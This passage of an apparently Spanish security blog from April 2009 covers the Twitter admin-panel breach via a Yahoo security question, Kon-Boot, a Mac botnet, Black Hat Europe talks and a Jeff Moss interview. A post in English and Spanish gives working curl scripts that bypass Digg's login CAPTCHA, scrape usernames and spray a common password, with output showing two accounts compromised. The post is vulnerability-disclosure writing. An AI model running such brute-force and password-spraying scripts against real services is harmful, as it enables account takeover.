30 abril 2009

¿Cómo accedieron al panel de administración de Twitter?

Es la moda, está claro. Hace unos minutos que me he enterado, y realmente tenía intención de no darle mayor importancia, debido al alto número de titulares parecidos que salen últimamente, ya sabéis, lo del worm y esas cosas. Pero al empezar a hilar posts, noticias, comentarios, traducciones del francés, análisis y aclaraciones, creo que este tema tiene algo de interés, ya que existen informaciones erróneas que he ido leyendo en diferentes medios.

En 10 minutos, por mi cabeza ha pasado el "¿mmm cómo, por el .htaccess?", el "esto tiene que ser fake", "demasiadas evidencias para ser fake", "anda espera, puede ser por lo del correo", "¡ahhh vale vale, ahora lo entiendo!". Empecemos:

La noticia era clara: un usuario llamado Hacker Croll proclamaba por algunos foros que había conseguido entrar al panel de administración de twitter, y exactamente a través de esta dirección de administración: https://admin.twitter.com/admin/ protegida por .htaccess. Lo primero que se viene a la cabeza es la técnica "fuerza bruta" que tan buenos resultados da últimamente, que debido a ciertos antecedentes con este sistema de microblogging, podría ser no muy descabellado de llevar a cabo. Hacker Croll, ofrecía un conjunto muy amplio de evidencias/screenshoots, y las colgó en imageshack en las siguientes direcciones:

| |

| |

| |

| |


Al verlas todas, os daréis cuenta de que si se tratase de un fake...la verdad es que el chaval seguro que tardaría un tiempo en prepararlo, no lo haría con el paint precisamente. Muestra todos los entresijos de administración, con multitud de opciones, propio de un god@twitter, sin duda interesante. Como se suele decir, como Pedro por su casa...

De repente empezó a surgir la duda de si realmente había conseguido las credenciales, o si lo único que había conseguido eran las capturas por algún sitio, o si las imágenes habían sido filtradas desde dentro de la organización. ¿Por qué esto último? Fijémonos en la captura 1, el último tweet (marcado debajo de la caja de "What are you doing?" seguido del Latest) en el que hace un llamamiento a alguien de seguridad en Yahoo! y en esta entrada del señor Jason Goldman, en el que según si bio, trabaja en twitter:


Bueno, pues ya tenemos desde que perfil se accedió al panel de administración para realizar las capturas. Esto arroja las preguntas anteriores, ¿por qué Goldman iba a publicar esas capturas de lo más profundo de twitter?. Algunos ya le habréis sacado la conclusión hilando temas: todo fue gracias a la ingenieria social, pero no de hacerse pasar por alguien para pedirle la contraseña. Según Hacker Croll, simplemente respondió correctamente la pregunta de seguridad, consiguiendo acceder al correo personal de Goldman en Yahoo, en el que entre otros correos curiosos, se encontró la contraseña de acceso al panel.

En serio, ¿cuando la gente dejará de meter respuestas tan triviales a las preguntas de seguridad del tipo :

PREGUNTA:- ¿soy humano?
RESPUESTA:- si


PREGUNTA:- ¿primera letra del abecedario?
RESPUESTA:- a

PREGUNTA:- escribir hola
RESPUESTA:- hola

Como sigamos así, vamos a tener que volver a recomendar lo de poner las contraseñas en post-its en la pantalla del ordenador por si se te olvidan, porque para el caso...
Leer más...

Kon-Boot, arrancando windows sin contraseña

Pretendía escribir un artículo técnico después de leer que se había lanzado una herramienta para arrancar sistemas Windows y Linux sin contraseña, me imaginaba que toparía con otro LiveCD de linux que monta el sistema de ficheros y saca los hash aplicándole posteriormente fuerza bruta, como OphCrack. Otra de las opciones más comunes es la sobre-escritura del fichero de contraseñas, con la que directamente al modificarlo cambiamos la antigua por una nueva. Como por ejemplo hace:
Offline NT Password & Registry Editor o Active Password Changer.

Kon-Boot es mucho más, Kon-Boot no necesita modificar ni montar el sistema de ficheros, no cambia ni trata de obtener la vieja contraseña. Ni si quiera requiere mínimos conocimientos. Como diría Miguel de Icaza, "hasta mi mama podría utilizar esta herramienta".

La aplicación desarrollada para KryptosLogic por Piotr Bania, uno de los pesos pesados en esto de la seguridad, parchea directamente en memoria el kernel saltando el proceso de autenticación e introducciendonos directamente como Administrador/root del equipo.

Su uso es tan simple como arrancar con un CD o un Disquete y presionar la tecla de espacio. Lo siguiente que veremos es el equipo arrancado con el botón de Inicio esperando ser pulsado.

Muestro las dos únicas pantallas que se ven. Estas pantallas son informativas y no permiten realizar ninguna acción.



Leer más...

29 abril 2009

Hackeos Memorables: Digg.com

Objetivo cumplido: nuestra Ministra González-Sinde hoy ha ganado karma internacional.



Si, lo hemos conseguido, tenemos toda una portada en digg.com, el sitio de referencia de promoción de noticias.

¿Se ha vuelto solidaria la Internet Anglo-sajona con las miserias que suceden en España? No, vale, hay trampa :P

Hace unos días hablábamos de un bug bastante gordo en Digg.com referente a la forma en la que digg implementaba su sistema de captchas que dejaba abierta la puerta a potenciales ataques.

Nos pusimos en contacto con Digg, y nos enviaron un amable correo-estándar con un 'vale ya lo miraremos' Evidentemente no es tarea fácil contener la tentación de poner a prueba el hallazgo, así que, dada la pasividad de Digg al respecto, nos pusimos manos a la obra para hacer una 'inocente travesura'.

Los detalles técnicos no seria muy honesto revelarlos en este punto de la historia, porque aun se puede realizar el ataque.

Pese a que este hecho parece irrelevante, existen empresas de Marketing que se dedican a vender "votos" (denominados diggs), para que nuestra noticia sea promovida . Algo que por otro lado, está prohibido en los términos de uso (5.9).




Re-diggo lo dicho para el caso de Meneame (que no merecía tanto esfuerzo):
  1. Es un error que el usuario de la aplicación sea el mismo que para la autenticación. Sería más robusto si se autenticase con correo/contraseña.
  2. Una contraseña segura, no es una contraseña de 6 caracteres.
  3. Los CAPTCHAs son un sistema fiable, pero han de implantarse correctamente y formar parte de la auditoría.
Leer más...

iBotnet: red basada en Macs zombies

Estamos acostumbrados a oir que la mayor parte de las botnets están formadas por legiones de máquinas Windows infectadas de diversas maneras: vulnerabilidades encontradas en uPNP, servicios Microsoft (Blaster, Sasser, Conficker!!!!), ejecución de código malicioso mediante navegadores no parcheados convenientemente, y por supuesto como contenido no requerido por la ejecución de software proveniente de descargas en redes P2P...

Hace unos días se ha confirmado la existencia de una botnet formada únicamente por ordenadores de la marca de la manzana mordida, cuya intención, lo más probable es que sea generar ataques DDoS contra objetivos seleccionados a voluntad del que la controla. Su objetivo principal es obtener la contraseña del usuario (en base a otras técnicas) y permitirá controlar la máquina por parte del atacante.

Por lo visto, el origen de la troyanización de los diversos Macs viene dada mediante el engaño que se crea en el usuario que descarga (ilegalmente) un paquete de software llamado iWork 2009 de redes P2P. Los causantes de dicha infección modificaron una copia de iWork09 y Adobe Photoshop CS4 añadiendo un paquete nuevo llamado iWorkServices.pkg y la colgaron en la red P2P más popular. A partir de ahí, solo había que esperar que los usuarios de este tipo de servicio, no hicieran caso a la ministra Ángeles Gonzalez Sinde(scargas) y lo pusieran a bajar.

Al instalarlo y ejecutarlo (se copiará en /System/Library/StartupItems/iWorkServices con permisos de lectura, escritura y ejecución), aparentemente dispondremos de la última versión del paquete ofimático iWork09, pero además y de regalo, estaremos ejecutando alguna de las dos mutaciones que hay hasta ahora de este virus: OSX.Iservice y OSX.Iservice.B. Dicho troyano se comunicará con un servidor remoto indicando al desarrollador que ha infectado un nuevo equipo y que lo tiene a su disposición para lo que guste mandar.
Leer más...

28 abril 2009

Dia internacional de CRAPCHAs

Hoy todo el mundo habla de CAPTCHAs, F-Secure publica en su blog una nota sobre malware que registra automáticamente cuentas de Gmail mediante un servicio que utiliza personas para esta tarea. Nada nuevo.

Por otro lado, tenemos a todos los medios de comunicación tradicionales, haciendose eco de que la revista Time ha sido objeto de un ¿hackeo? para burlar su votación. Los detalles de esta noticia son muy interesantes.

Y digo yo... Después de nuestra entrada sobre los Espartanos, ¿lo mio es obsesión?.

Por generar algo de ruido... y después de notificar a Digg, a ver si conseguimos ser portada y que no me borren el usuario.
Leer más...
Hace pocas semanas, un joven newyorkino de 17 años creó un gusano que sembró el pánico en Twitter. El exploit explotaba la vulnerabilidad de tipo cross-site scripting creando miles de tweets automáticos desde las cuentas infectadas.

Mensajes como estos se podían ver publicados en distintos perfiles de la red social:

Twitter, this sucks! Fix your coding.
Twitter Security Team Really? You need to be fired.
Horrible Coding!

Según comenta el joven Mikkey, lo hizo por mero aburrimiento y por su buena fé reportó el problema a Twitter. Aunque dicen las malas lenguas que trataba de demostrar que su site StalkDaily.com erá mejor que el original.

Ya hablamos anteriormente sobre el hecho de contratar a un convicto y no faltó tiempo para que le ofrecieran dos ofertas de trabajo para realizar análisis de seguridad en empresas de desarrollo web. La empresa afortunada ha sido exqSoft Solutions. También se comenta que la empresa pretendía hacerse autobombo contratando al joven genio.

No es la primera vez que Twitter tiene problemas de seguridad, ya comentamos en el blog que fue un enero negro para Twitter, entre el phishing y el robo de credenciales mediante ataque de diccionario. Después en marzo salió otro ataque por virus via XSS que forzaba a los usuarios logados a postear mensajes simplemente pinchando en un link.

Twitter, da la sensación de ser muy poco robusto y no paran de salirle bugs. Si comparamos el historial de Twitter con cualquier servicio de Google, la diferencia deja muy mal parado al servicio de micro blogging. Entre esto y detalles como cambiar sobre la marcha de Ruby-On-Rails a SCALA, Twitter da la sensación de tener un grado de 'amateurismo' superior a cualquier proyecto universitario colgado en sourceforge.
Leer más...

27 abril 2009

Se buscan voluntarios para Ciber 'Equipo A'

Varias noticias relacionadas con estrategias 'poco comunes' para enfrentarse al ciber-crimen.

Por un lado, desde el DHS (Department of Homeland Security) Americano, que viene a ser como el hermano pequeño y malnutrido de la todopoderosa y cada vez mas omnisciente NSA, se ha lanzado a buscar 'White Hackers' para ampliar su equipo de colaboradores. Se buscan perfiles con experiencia en análisis de vulnerabilidades, tráfico de red ...

Desde la RSA Conference me llega el resumen del speech impartido por la gente de SecureWorks donde directamente proponen una especie de 'mercenariado' al estilo del añorado Equipo A en versión cibernética para contra-atacar 'a los malos'.

Finalmente un dato curioso, según los responsables de la Policía de Nueva York, sus redes reciben al cabo del día un numero aproximado de 70.000 rastreos en búsqueda de vulnerabilidades, según dicen la mayoría desde IPs Holandesas o Chinas
Leer más...

23 abril 2009

Applying Spartans Brute Force Against Digg

Last week lot of media talked about a new captcha method proposed by Google, a new way of image generation.

Because of this method, OCR attacks against method could be disabled and more comfortable for the users to submit the string which appeared, in computers or mobile devices too.

In the middle of the research of something related about this topic, I detected several errors in some websites which we will check eventually.

CAPTCHA was created to avoid automation, for example preventing spam robots to post comments on a blog or to protect a web login process for brute force attacks.

As my grandmother used to say: "You will be always good at something, even if it is for a bad purpose", so this time, the winner is Digg.com.

This well-known social news website show us a captcha on the fourth failed login attempted, so with this system it should prevent that a hell-script could brute-force the webform trying to guess the account password.

Digg counts these attempts only based in session, which is regenerated if it doesn't exist.

The process would be as follows:

  1. I submit user and password through a POST request.
  2. A session is created and the server responses a 302 (HTTP redirection method) to other page which checks if the session is correct or not based on the user and password submitted.
  3. If the password is correct, everything is ok, if not it takes me to the login page with an error and the same session with one failed attempt.
  4. 4. I kill the session (and with this, the counter will reset) and i submit again the user and password, and this takes me again to the first step. So with this, the captcha won't be shown to us because the failed attempted login count won't be never more than one.

We will use curl to automate these steps:
for i in `cat wordlist.txt`; do
echo -n $i; curl -c digg.txt -s -L -D - -d
"username=usuario&password=$i&persistent=on"
'http://digg.com/login/prepare/digg' | grep -Ei "D.meta.user.loggedIn|incorrect";
done
wordlist.txt has a list of words.


This script will output something like this:

eryyyert <div><h3>Your Username or Password was incorrect</h3></div>
rtwertw <div><h3>Your Username or Password was incorrect</h3>< div>
dsfhdhcnh <div><h3>Your Username or Password was incorrect</h3><div>
fdgsdfghsj <div><h3>Your Username or Password was incorrect</h3><div>
dfgdsfgdfg <div><h3>Your Username or Password was incorrect</h3><div>
aaaaaaa <div><h3>Your Username or Password was incorrect</h3></div>
Cochecito D.meta.user.loggedIn = "usuario";
adfsdf <div><h3>Your Username or Password was incorrect</h3></div>
asdffffff <div><h3>Your Username or Password was incorrect</h3></div>
The first string is the word we tested as password. "Cochecito" is the password of the user tested, the rest....incorrect

Maybe Interpol will knock our door before we get the wanted password, but the weakness of this validation process is proved.

Checking again this previous entry posted months ago and with some tweaks, i have discovered that both of sites share mostly the same weaknesses, for example the one about credentials through http instead of https, or that it's possible to obtain a list with valid usernames. So let's play again a bit more...

Firstly, we will fetch with a script a list containing valid usernames:

for i in `seq 2 245`; do
curl -s
http://digg.com/page$i| tr '<' '\n'|grep 'href="/users/' sed -e 's.*/\(.*\)\">\1g'
done| sort |uniq >lista.digg
Welcome to 700 or 800 valid usernames (lista.digg) . Now, ladies and gentlemen, let's bring Google to the scene:
site:digg.com inurl:/users/

What about trying the most common passwords? 123456, password, qwerty, liverpool ....

for i in `cat lista.digg`; do echo -n $i; curl -c digg.txt -s -L -D - -d
"username=$i&password=123456&persistent=on"
'http://digg.com/login/prepare/digg'| grep -Ei "D.meta.user.loggedInincorrect";
done |tee -a pass.txt
We don't get a lot of them, but it' more than nothing
[aramosf@sbd ~]$ grep logged pass.txt wc -l
2
Leer más...

Aplicando fuerza espartana a Digg.

La semana pasada muchos medios se hicieron eco sobre un estudio que ha realizado Google sobre los captchas, donde proponen un nuevo método para la generación de imágenes.

Gracias a este sistema, se evitarán ataques mediante el reconocimiento OCR de las imágenes, además de facilitar al usuario la introducción de datos, tanto en pcs como en dispositivos móviles.

Como el tema está trillado, iba a proponer un tema nuevo, pero según trabajaba en ello, he detectado varios errores en algunas webs que vamos a comentar.

Los captcha nacen con la idea de evitar automatismos, concretamente son preocupantes el spam en los comentarios de los blogs y a la hora de evitar los ataques por fuerza bruta en formularios web de autenticación.

Como decía mi abuela: siempre servirás de algo, aunque sea de mal ejemplo, así que vamos a utilizar el portal Digg como conejillo de indias.

Esta web social solicita un captcha después del cuarto intento de autenticación fallida, de está forma se asegura que no hay un script del infierno tratando de obtener usuarios y contraseñas.

Lo que hace Digg es contabilizar estos intentos utilizando únicamente la sesión, que es creada nuevamente siempre que no exista

El proceso que seguiría es el siguiente:
  1. Envío usuario y contraseña mediante un POST
  2. El servidor crea una sesión y me devuelve un 302 (redirección) a otra página que comprueba si la sesión es correcta o incorrecta en base al usuario y contraseña
  3. Si la contraseña es válida paso, si no es válida me envía a la página de autenticación con un error y la misma sesión que suma 1 error fallido.
  4. Elimino la sesión (y con ello el contador) y repito el envío de usuario y contraseña, volviendo al punto 1. Por lo que el captcha no aparecerá nunca al no sumar los cuatro intentos.
Esto es más fácil viéndolo con un curl:
for i in `cat wordlist.txt`; do
echo -n $i; curl -c digg.txt -s -L -D - -d "username=usuario&password=$i&persistent=on" 'http://digg.com/login/prepare/digg'| grep -Ei "D.meta.user.loggedIn|was incorrect";
done
Básicamente recorre un archivo "wordlist.txt" (que entendemos contiene las contraseñas a probar), y va mostrando algo similar a esto:

eryyyert <div><h3>Your Username or Password was incorrect</h3></div>
rtwertwery <div><h3>Your Username or Password was incorrect</h3></div>
dsfhdhcnh <div><h3>Your Username or Password was incorrect</h3></div>
fdgsdfghsj <div><h3>Your Username or Password was incorrect</h3></div>
dfgdsfgdfg <div><h3>Your Username or Password was incorrect</h3></div>
aaaaaaa <div><h3>Your Username or Password was incorrect</h3></div>
Cochecito D.meta.user.loggedIn = "usuario";
adfsdf <div><h3>Your Username or Password was incorrect</h3></div>
asdffffff <div><h3>Your Username or Password was incorrect</h3></div>
Donde la primera palabra es la contraseña probada y el resultado de si es válido o no. Entendiendo que "Cochecito", sería la correcta y el resto... no

Es posible que llame la Interpol a la puerta antes de que demos con la contraseña buscada, pero la debilidad en la implantación queda demostrada.

Recordando otra entrada vieja y limpiándole polvo, he encontrado que tienen prácticamente los mismos problemillas, como el usuario y contraseña que no va por https, o que se pueda obtener una lista de usuarios válidos. Así que continuaremos un poquito más con el juego.

Para obtener una lista de usuarios válidos:
for i in `seq 2 245`; do
curl -s http://digg.com/page$i |tr '<' '\n'|grep 'href="/users/' | sed -e 's|.*/\(.*\)\">|\1|g'
done | sort | uniq >lista.digg
Lo que obtendrá una lista (lista.digg) de entre 700 y 800 usuarios. Podríamos utilizar Google Dorks para obtener más:

site:digg.com inurl:/users/
Y ahora, a probar las contraseñas más utilizadas: 123456, password, qwerty, liverpool ....
for i in `cat lista.digg`; do echo -n $i; curl -c digg.txt -s -L -D - -d "username=$i&password=123456&persistent=on" 'http://digg.com/login/prepare/digg'| grep -Ei "D.meta.user.loggedIn|incorrect"; done |tee pass.txt
En total, no es que hayan salido muchas, pero algo es algo:
[sbd@velouria ~]$ grep logged pass.txt | wc -l
2
Leer más...
Es hora de resumir el día 2 (17 de Abril) de la Black Hat 09 Europe que se celebró la semana pasada en Amsterdam, en el hotel Moevenpick Amsterdam City Centre. El día de hoy se nos presentaba muy entretenido, ya que teníamos por delante la charla de Rootkits en .NET, a primera hora con el desayuno reciente, y la presentación de Chema Alonso y Enrique Rando sobre metadatos justo después de la comida.

* 09:00 - 10:15 = (Track 2) .NET Framework Rootkits: Backdoors inside your Framework - Erez Metula

Lo que nos planteaba Erez Metula en su conferencia era el llevar el concepto de rootkit, ampliamente conocido por todos al implantarse en sistemas operativos una vez se han visto comprometidos, pero en el framework .NET. Esto permitiría, aprovechándonos de la falta de comprobación de la firma de los componentes, remplazar trozos de código por otros que realizasen otra función. En las demostraciones se mostró por ejemplo como era posible modificar la típica función de escribir por pantalla, Console.WriteLine, para que pintase dos veces en vez de una la cadena deseada. No hace falta deciros en lo que podría desembocar esto si lo llevamos a otro tipo de acciones.

Unos prefieren sacar las contraseñas o navegar por los documentos de la víctima afectada al comprometer su sistema; pues bien, aquí disponemos de otra alternativa más enfocada "a largo plazo". Finalmente, dejaba la puerta abierta, y comentó que ya se encontraba investigando otro tipo de frameworks de otros lenguajes, en los que había descubierto que también podría realizar modificaciones. Erez, en varias de sus diapositivas, quería recalcar la "pasividad" por parte de Microsoft y su centro de investigación en reconocer que esto es una vulnerabilidad, por el hecho de que para conseguir su objetivo, ya era necesario ser administrador del sistema. ¿Estáis de acuerdo? Tenéis los comentarios abiertos.

Si os interesa el tema y queréis saber más, podréis visitar su página dedicada a los rootkits en .NET, así como su paper presentado para esta Black Hat aquí. En ellos se incluye más información sobre la herramienta que ha desarrollado, .NET Sploit, que se encarga de facilitar toda la tarea de modificación.

* 10:30 - 11:45 = (Track 2) Stack Smashing as of Today: A State-of-the-art Overview on Buffer Overflow Protections on linux_x86_64 - Hagen Fritsch

Mientras en el Track 1 se daba la charla de ePassports, de la que ya se habló en la edición de Las Vegas (asistentes a esta charla nos dijeron que las demostraciones fueron muy interesantes y amenas a pesar de no aportar novedad alguna) hacía unos 3 años, decidimos entonces asistir a la charla de este joven estudiante de informática, Hagen Fritsch, en la que se presentarían técnicas que permitirían saltarse las protecciones NX, ASLR o las stack-cookies. Fue una charla interesante, que merecería la pena analizar de nuevo con más detenimiento y con todo el material que aportó el autor.

En el turno de preguntas, Jeff Moss, que asistió a la charla desde su comienzo, preguntó al autor si conocía la existencia de grsec y si había investigado con él. Para mi sorpresa, dijo que no había oído hablar nunca de eso.

Ya se ha publicado lo que presentó en la conferencia, tanto lo referente a los desbordamientos de búfer en linux-x86-64, así como el tema que fue protagonista de la mayoría de sus demostraciones realizadas, el saltarse la protección ASLR prediciendo su procesamiento aleatorio. Las diapositivas de esta presentación las podréis descargar de su página principal.


Después de esta charla, durante el descanso de 15 minutos, pudimos realizar la entrevista a Jeff Moss, fundador de la Black Hat, que podréis encontrar íntegra en este post publicado ayer. De todo lo que nos contó, destacaríamos, como no, la noticia de que la edición europea del 2010 se realizará en España, más concretamente Barcelona, con el objetivo de intentar ampliar el número de charlas incrementando la cantidad de tracks, que se está trabajando en un portal social para congregar a la comunidad de la Black Hat e interactuar con todo el contenido del que disponen, y que la crísis financiera mundial también ha afectado a las conferencias de seguridad.

La entrevista hizo que llegásemos tarde a la conferencia de las 12.00, que en este caso iba a ser la ofrecida por Rob Havelt del equipo SpiderLabs perteneciente a TrustWave (que regalaban camisetas en el stand que tenían en la Black Hat al igual que otras compañías patrocinadoras del evento) titulada Yes It Is Too WiFi, and No It's Not Inherently Secure, del Track 1. Se centraba en la técnica de transmisión de modulación por saltos de frecuencia (FHSS), antigua pero aún utilizable por alguna que otra compañía, la cual resulta bastante insegura ya que con el ESSID de la red (fácilmente obtenible por encontrarse en ), así como un patrón de esos saltos, en pocos segundos podríamos unirnos a dicha red, y en caso de encontrarse protegida...siendo como es una clave WEP de 40-bit, que os voy a contar...


Para todo esto, Rob se ha construido un dispositivo que es capaz de localizar beacon frames de estas redes FHSS, a un precio más o menos razonable (según él, no llegaba a 1000 dólares). Quizás el gran fallo que le ví a la charla fue la ausencia de demos. Aquí podréis descargaros el whitepaper sobre lo que presentó.

Y llegamos a otra de las charlas más esperadas de esta edición:

* 14:15 - 15:30 = (Track 1) Tactical Fingerprinting Using Metadata, Hidden Info and Lost Data - Chema Alonso, Enrique Rando


Esta vez, se realizaría una introducción sobre tipos de metadatos y su utilización para poder obtener información interna que nos pudiera servir de gran ayuda para que según que escenarios. Y no hablamos de la información que por ejemplo se podría obtener de una foto, en la que se nos indica que tipo de cámara se ha utilizado para realizarla. Hablamos de nombres válidos de usuario, información de las diferentes versiones de un documento, datos sobre la infraestructura interna de una organización, y un largo etc. El análisis se realiza mediante una herramienta, FOCA, que es capaz de obtener todo lo posible de un documento, y de la que ya os hemos hablado por aquí anteriormente. En esta edición se presentaría su versión descargable, y en su blog, Chema ya ha comenzado a publicar su manual de uso.

Sin duda fué una de las presentaciones que más expectación generó (la sala estaba completamente llena, algo que no se vió en el resto de conferencias salvo alguna excepción), y fué capaz de arrancar carcajadas y aplausos al igual que ocurrió con la de Maltego el día anterior, y fueron muchos los que se acercaron a hablar con los dos protagonistas una vez finalizó la charla. Las frases más repetidas en ese momento fueron las de "Enhorabuena por la conferencia, ha sido genial" y "¿Sabéis que el enlace a la FOCA no funciona?". Para esta última pregunta hizo falta pegar un telefonazo con el +34 delante para que la versión descargable del programa funcionase cuanto antes. El paper de la conferencia lo podréis encontrar aquí, y las slides las han subido a este enlace de slideshare.


El encuentro de la prensa posterior se alargó bastante debido a la alta afluencia de personas que querían comentar la herramienta o realizar cualquier pregunta sobre lo mostrado. Esto, y que había que despedir a Enrique y Chema como se merecían después de tan magnífica charla, ya que cogían un vuelo esa misma tarde, hizo que nos perdiésemos las charlas de las 15:45 a las 17:00. En este rango comenzó la presentación OpenOffice Security Design Weaknesses, por Eric Filiol, de los fallos de diseño en la seguridad de OpenOffice, del que esperamos poder ofreceros un post sobre este tema en un futuro no muy lejano. Mientras podréis hechar una ojeada tanto al paper como a las slides ya publicadas. Seguidamente, asistimos a las últimas charlas de esta edición, más concretamente la que nos presentaba un firewall de aplicaciones web que se basaba en detección de anomalías, llamado Masibty.

* 17:15 - 18:30 = (Track 1) Masibty: A Web Application Firewall Based on Anomaly Detection - Stefano Zanero & Claudio Criscione

Con la intención de echar por tierra los sistemas de detección basados en reglas, por la poca visión en cuanto a la evolución hacia posibles nuevos ataques, Stefano y Claudio proponen Masibty, un firewall de aplicaciones web que se alimenta del comportamiento normal de una aplicación permitiendo crear una especie de flujo correcto del funcionamiento que es capaz de detectar cuando existe una anomalia en su utilización.

Esta herramienta ya fué presentada en la Black Hat de Washington DC de este año, en febrero, y aún todavía no se ha publicado ni la documentación, ni el paper ni las diapositivas mostradas, así como la aplicación en sí por tratarse todavía de una versión beta. Sobre la técnica, he encontrado varios enlaces en la página personal de Stefano. Es más, en las demostraciones que se realizaron se podía observar como los ponentes ejecutaban su servicio en Eclipse, el entorno de desarrollo que utilizaban. Seguiremos de cerca el desarrollo hasta que por fín podamos probar su eficacia cuando se pueda implantar para su uso.


Y con esto llegamos al final del día 2 y de los resumenes de esta edición europea de Black Hat 2009. De este segundo día, personalmente me quedo con las siguientes presentaciones:

1) .NET Framework Rootkits: Backdoors inside your Framework
2) Stack Smashing as of Today: A State-of-the-art Overview on Buffer Overflow Protections on linux_x86_64
3) Tactical Fingerprinting Using Metadata, Hidden Info and Lost Data

Seguiremos investigando más sobre todos los temas presentados en este ciclo de conferencias, poniendo especial hincapié en aquellas a las que no asistimos y que nos quedamos con las ganas de poder conocer más. De momento, estaremos al tanto de lo que publican en los archives de la página oficial.

Posts relacionados:
[+] SecurityByDefault cubrirá la Black Hat Europe 2009
[+] Resumen Black Hat '09 Europe: Día 1 (16 de Abril)
[+] Black Hat Europe '09: Entrevista a Jeff Moss
Leer más...

22 abril 2009

Prueba Avira Premium Security Suite durante 6 meses

El verano pasado recomendaba instalar Avira Antivir en su versión gratuita, un potente antivirus que en general da excelentes resultados.

También comentábamos que siempre que actualiza la base de datos de firmas, muestra una ventana con publicidad. Un precio a pagar muy pequeño teniendo en cuenta la calidad del producto.

Hoy, gracias a Zero, he visto que hay una promoción, para obtener una licencia de 6 meses para su producto premium security suite (39,95€). Esta suite incluye un montón de paquetes adicionales como Backup, cortafuegos, filtros web y otros módulos.

En definitiva, puede ser un buen momento para probar una solución desconocida y potente que no defrauda.
Leer más...

Black Hat Europe '09: Entrevista a Jeff Moss

Como ya os adelantamos estando en la Black Hat, tuvimos la oportunidad de entrevistar a Jeff Moss, fundador de este congreso y también de la DEFCON, para que nos contase más información sobre la noticia de que el año que viene la edición europea venga a nuestro país, entre otros temas.

Queremos dar las gracias desde aquí a Dirk Sell, encargado de la parte de prensa del evento por concertarnos esta cita, y al propio Jeff Moss por dedicarnos un poco de su tiempo que justo coincidía con uno de los descansos entre charla y charla.


SecurityByDefault: Lo primero de todo, preguntarte sobre la noticia que para nosotros como españoles más nos ha sorprendido, y es que la próxima edición de la Black Hat Europa se traslade desde Amsterdam a Barcelona. ¿Qué más nos puedes contar?

Jeff Moss: Pues en principio se tiene previsto que se realice en el hotel Rey Juan Carlos, entre los días 12 y 15 de Abril. Pondremos más información en la página principal en una semana o dos, cuando tengamos datos más concretos sobre si finalmente es en este hotel y demás.

¿Cual es el motivo, después de tanto tiempo celebrando esta edición europea en Amsterdam, por el cual se ha decidido moverla a Barcelona?

Realmente, es que no podemos seguir creciendo aquí en Amsterdam. A mi me gusta muchísimo Amstedam, pero este es el hotel más grande que pudimos encontrar. Actualmente tenemos dos tracks, pero lo que realmente me gustaría es tener tres, por lo que necesitamos finalmente un lugar en el que poder seguir creciendo. Buscamos en Praga, Paris, Alemania, buscamos también en Viena y Barcelona. Intentamos escoger las fechas más adecuadas, atendiendo a las dimensiones de los hoteles.

Es que son muchos aspectos a tener en cuenta...

Si, es más, nos va a costar más dinero celebrarla en Barcelona que lo que nos cuesta aquí, por el tema de impuestos y demás, alrededor de un 10% más realizando el mismo evento. Pero lo que nos da es esperanzas de conseguir más espacio para crecer, porque vemos que aquí no hay posibilidad de expandirnos mucho más.

Supongo que estarás al tanto de que justamente la conferencia SOURCE que se celebra en Boston, este año tendrá su edición en Barcelona.

Si si, lo sé, y es curioso, porque ellos tenían intención de hacerla en Amsterdam, pero como nosotros estábamos aquí, decidieron que sería más conveniente irse a Barcelona. Cuando yo les comentaba mi idea de hacerla el año que viene en Barcelona ellos dijeron "ah, pues entonces si eso nos tocaría ir a Amsterdam a nosotros" (risas)

Menuda coincidencia...

La verdad que si, su intención era intentar no hacerla en el mismo lugar en el que la hacíamos nosotros, y cuando los vi en DC me comentaron que finalmente habían elegido Barcelona.

Queríamos preguntarte también sobre la DEFCON, como fundador al igual que lo eres de Black Hat. Sabemos que el punto de vista y la finalidad entre las dos conferencias es distinta, pero la DEFCON es conocida también a nivel internacional aunque únicamente se celebre en Estados Unidos. ¿Se ha pensado alguna vez también en realizar ediciones fuera de Estados Unidos al igual que sucede con la Black Hat?

Bueno, en realidad tenemos grupos DEFCON en otros países. Lo que hacemos es apoyarles en caso de que quisieran realizar algo, como por ejemplo reunirse, promover charlas o lo que sea. Pero ya hay muy buenas conferencias de hacking alrededor del mundo, así que no quiero competir directamente con ellos. Prefiero apoyarles con lo que hacen localmente, en vez de venir "desde fuera".


En realidad es un concepto de conferencia distinto en según que aspectos

Si, pero probablemente si algún grupo quisiese cabría la posibilidad de montar algo juntos, pero ahora mismo en lo que más centrado estoy de cara al año que viene es en impulsar los grupos DEFCON. Veo mejor invertir mi energía en apoyar a estos grupos en vez de crear desde cero más DEFCONs en otros países.

¿Y también poner más dedicación en la Black Hat?

Si exacto. Cancelamos nuestra edición en Japón, y estamos negociando la posibilidad de ir a Singapur u algún otro país del medio-este. Ahora estamos analizando qué tipo de eventos hacemos y haremos. Tenemos lo de Barcelona, quizás lo de Singapur, también podríamos hacer algo en Australia y demás. Estamos atravesando un año bastante malo en todos los aspectos.

¿Entonces habéis notado esta crisis mundial de la que tanto se habla?

Totalmente, es más, hemos perdido alrededor del 15% de asistencia en esta edición. Que al final te paras a pensar y tampoco es un dato muy negativo, teniendo en cuenta que otras conferencias han sufrido un decremento casi del 40%. Así que realmente, en todas las convenciones de seguridad ha disminuido algo la asistencia. La semana que viene estaré en la RSA de San Francisco, y ya comentan que alrededor de un 30%. Otros eventos tenían un 70% y al final se han echado atrás. Así que lo interesante este año será ver quién es capaz de sobrevivir a lo que atravesamos. Lo único que podemos hacer es aguantar y estar a la espera.

Ahora mismo estamos dedicando la mayor parte de nuestra energía en el desarrollo de un portal social de la Black Hat.

Es lo que expusiste en la introducción de este año ¿verdad?

Si, por ejemplo, cada mes tenemos Webinars, así que la idea es que la gente pueda seguirnos día a día en todas las actividades y construir así una especie de portal social de seguridad. Nuestra intención no es competir con sitios como Bugtraq por ejemplo o un Facebook, ya que son comunidades ya establecidas. Lo que nos interesa es establecer un sitio sencillo en el que se pueda seguir todo nuestro contenido, ya sea revisando material que se presentaría en un futuro, charlas enviadas, aportando posts o feeds de blogs propios con temas interesantes, aunque en un principio se presentasen a un público menos reducido.

Es algo interesante porque seguramente a mucha gente le de algo así como "miedo" o respeto a publicar y enviar sus artículos o documentos.

Exacto, lo que queremos es que se mantengan las discusiones o debates con más regularidad, y no sólamente cuando haya un evento, porque ahora mismo se habla mucho cuando llega una Black Hat, y cuando termina ya no se sabe nada, y así sucesivamente. Así que nos preguntamos el cómo podríamos hacer para que la gente siguiese con esta experiencia. De ahí surgió la idea de empezar primeramente con un sitio pequeño, y que poco a poco se vaya creando una experiencia ya consolidada.

